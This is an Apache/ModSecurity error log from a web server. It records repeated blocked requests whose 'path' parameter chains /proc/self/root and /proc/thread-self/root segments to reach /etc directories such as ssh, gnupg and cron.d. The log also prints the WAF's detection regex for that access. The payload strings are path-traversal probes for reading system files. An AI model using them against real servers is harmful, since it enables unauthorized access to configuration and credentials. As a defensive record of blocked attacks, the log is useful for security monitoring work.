[Tue Mar 17 14:25:05.187369 2026] [:error] [pid 7004:tid 140411641214720] [client 74.7.243.128:51824] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmOccU6Sx0TG1YjmQiwAAAAAow"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 14:25:05.914375 2026] [:error] [pid 2473:tid 140411733534464] [client 74.7.241.31:43766] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmOcaBJNF7axNlVR0UYmAAAAAE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:25:06.627828 2026] [:error] [pid 9299:tid 140411590858496] [client 74.7.243.128:51830] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmOcr-sgTmmJoPuMdy3iwAAAtI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 14:25:07.356883 2026] [:error] [pid 9299:tid 140411624429312] [client 74.7.241.31:33956] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmOc7-sgTmmJoPuMdy3jAAAAs4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:25:08.083564 2026] [:error] [pid 6296:tid 140411565680384] [client 74.7.243.128:51834] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmOdHIk7brgkOH-rIWNDQAAAVU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 14:25:08.873662 2026] [:error] [pid 28879:tid 140411649607424] [client 74.7.241.31:33960] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmOdFDN3UhJjLukrK-MZAAAAQs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:25:09.603395 2026] [:error] [pid 7004:tid 140411691570944] [client 74.7.243.128:35638] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmOdcU6Sx0TG1YjmQiwAgAAAoY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 14:25:10.308741 2026] [:error] [pid 19507:tid 140411616036608] [client 74.7.241.31:33962] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmOdtY0UrI5A3LftIz9SwAAAY8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:25:23.041958 2026] [proxy_fcgi:error] [pid 29151:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:59252] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:25:24.332331 2026] [:error] [pid 6296:tid 140411649607424] [client 74.7.243.128:47814] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmOhHIk7brgkOH-rIWNFAAAAUs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 14:25:25.071269 2026] [:error] [pid 18380:tid 140411725141760] [client 74.7.241.31:52162] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmOha4xEDsg_V3ESNZNsgAAAgI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:25:26.478222 2026] [:error] [pid 7437:tid 140411733534464] [client 74.7.241.31:52168] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmOhgeiSKl8TjouI-Ya7wAAA8E"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:25:26.930013 2026] [:error] [pid 18380:tid 140411582465792] [client 74.7.243.128:47826] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmOhq4xEDsg_V3ESNZNtAAAAhM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 14:25:27.958159 2026] [:error] [pid 2598:tid 140411607643904] [client 74.7.241.31:58088] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmOhxj0p0SRWAqcjGF61QAAAxA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:25:28.633089 2026] [:error] [pid 2598:tid 140411708356352] [client 74.7.243.128:47832] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmOiBj0p0SRWAqcjGF61gAAAwQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 14:25:29.366948 2026] [:error] [pid 2473:tid 140411607643904] [client 74.7.241.31:58096] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmOiaBJNF7axNlVR0UYoAAAABA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:25:45.129789 2026] [proxy_fcgi:error] [pid 7004:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:59978] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:25:46.491494 2026] [:error] [pid 28879:tid 140411658000128] [client 74.7.243.128:49478] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmOmlDN3UhJjLukrK-McQAAAQo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 14:25:47.204349 2026] [:error] [pid 29151:tid 140411649607424] [client 74.7.241.31:54106] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmOm_PqhzTj3BvfDX-JRQAAAcs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:25:48.669183 2026] [:error] [pid 28879:tid 140411699963648] [client 74.7.241.31:44004] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmOnFDN3UhJjLukrK-McgAAAQU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:25:50.160608 2026] [:error] [pid 6296:tid 140411725141760] [client 74.7.241.31:44016] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmOnnIk7brgkOH-rIWNHAAAAUI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:26:07.094440 2026] [proxy_fcgi:error] [pid 29359:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:60830] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:26:09.220094 2026] [:error] [pid 29151:tid 140411683178240] [client 74.7.241.31:50436] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmOsPPqhzTj3BvfDX-JTQAAAcc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:26:11.367849 2026] [:error] [pid 19507:tid 140411649607424] [client 74.7.241.31:50450] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmOs9Y0UrI5A3LftIz9XgAAAYs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:26:12.811041 2026] [:error] [pid 17965:tid 140411658000128] [client 74.7.241.31:50460] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id 